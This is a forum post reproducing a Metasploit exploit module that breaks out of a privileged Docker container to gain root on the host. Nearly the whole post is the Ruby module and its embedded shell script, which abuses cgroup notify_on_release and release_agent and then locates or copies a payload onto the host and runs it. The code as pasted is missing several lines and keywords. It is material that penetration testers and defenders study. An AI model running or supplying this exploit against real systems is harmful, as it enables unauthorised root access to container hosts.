Jump to content

Docker Privileged Container Escape

Recommended Posts

This Metasploit module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release feature. This exploit should work against any container started with the following flags: --cap-add=SYS_ADMIN, --privileged.


# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

# POC modified from https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
            'Name' => 'Docker Privileged Container Escape',
            'Description' => %q{
              This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release
              feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.
            'License' => MSF_LICENSE,
            'Author' => ['stealthcopter'],
            'Platform' => 'linux',
            'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
            'Targets' => [['Automatic', {}]],
            'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
            'SessionTypes' => ['shell', 'meterpreter'],
            'DefaultTarget' => 0,
            'References' => [
              ['EDB', '47147'],
              ['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
              ['URL', 'https://github.com/stealthcopter/deepce']
            'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
        OptBool.new('ForceExploit', [false, 'Override check result', false]),
        OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]),
        OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']),
        OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']),

  def base_dir_container

  def base_dir_host

  # Get the container id and check it's the expected 64 char hex string, otherwise return nil
  def container_id
    id = cmd_exec('basename $(cat /proc/1/cpuset)').chomp
    unless id.match(/\A[\h]{64}\z/).nil?

  # Check we have all the prerequisites to perform the escape
  def check
    # are in a docker container
    unless file?('/.dockerenv')
      return CheckCode::Safe('Not inside a Docker container')

    # is root user
    unless is_root?
      return Exploit::CheckCode::Safe('Exploit requires root inside container')

    # are rdma files present in /sys/
    path = cmd_exec('ls -x /s*/fs/c*/*/r* | head -n1')
    unless path.start_with? '/'
      return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.')

    CheckCode::Appears('Inside Docker container and target appears vulnerable')

  def exploit
    unless writable? base_dir_container
      fail_with Failure::BadConfig, "#{base_dir_container} is not writable"

    pl = generate_payload_exe
    exe_path = "#{base_dir_container}/#{rand_text_alpha(6..11)}"
    print_status("Writing payload executable to '#{exe_path}'")

    upload_and_chmodx(exe_path, pl)

    print_status('Executing script to exploit privileged container')

    script = shell_script(exe_path)

    vprint_status("Script: #{script}")

    print_status "Waiting #{datastore['WfsDelay']}s for payload"

  def shell_script(payload_path)
    # The tricky bit is finding the payload on the host machine in order to execute it. The options here are
    # 1. Find the file on the host operating system `find /var/lib/docker/overlay2/ -name 'JGsgvlU' -exec {} \;`
    # 2. Copy the payload out of the container and execute it `docker cp containerid:/tmp/JGsgvlU /tmp/JGsgvlU && /tmp/JGsgvlU`

    id = container_id
    filename = File.basename(payload_path)

    vprint_status("container id #{id}")

    # If we cant find the id, or user requested it, search for the payload on the filesystem rather than copying it out of container
    if id.nil? || datastore['ForcePayloadSearch']
      # We couldn't find a container name, lets try and find the payload on the filesystem and then execute it
      print_status('Searching for payload on host')
      command = "find /var/lib/docker/overlay2/ -name '#{filename}' -exec {} \\;"
      # We found a container id, copy the payload to host, then execute it
      payload_path_host = "#{base_dir_host}/#{filename}"
      print_status("Found container id #{container_id}, copying payload to host")
      command = "docker cp #{id}:#{payload_path} #{payload_path_host}; #{payload_path_host}"


    # the cow variables are random filenames to use for the exploit
    c = rand_text_alpha(6..8)
    o = rand_text_alpha(6..8)
    w = rand_text_alpha(6..8)

      d=$(dirname "$(ls -x /s*/fs/c*/*/r* | head -n1)")
      mkdir -p "$d/#{w}"
      echo 1 >"$d/#{w}/notify_on_release"
      t="$(sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab)"
      touch /#{o}
      echo "$t/#{c}" >"$d/release_agent"
      printf "#!/bin/sh\\n%s > %s/#{o}" "#{command}" "$t">/#{c}
      chmod +x /#{c}
      sh -c "echo 0 >$d/#{w}/cgroup.procs"
      sleep 1
      cat /#{o}
      rm /#{c} /#{o}


  • Upvote 1
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...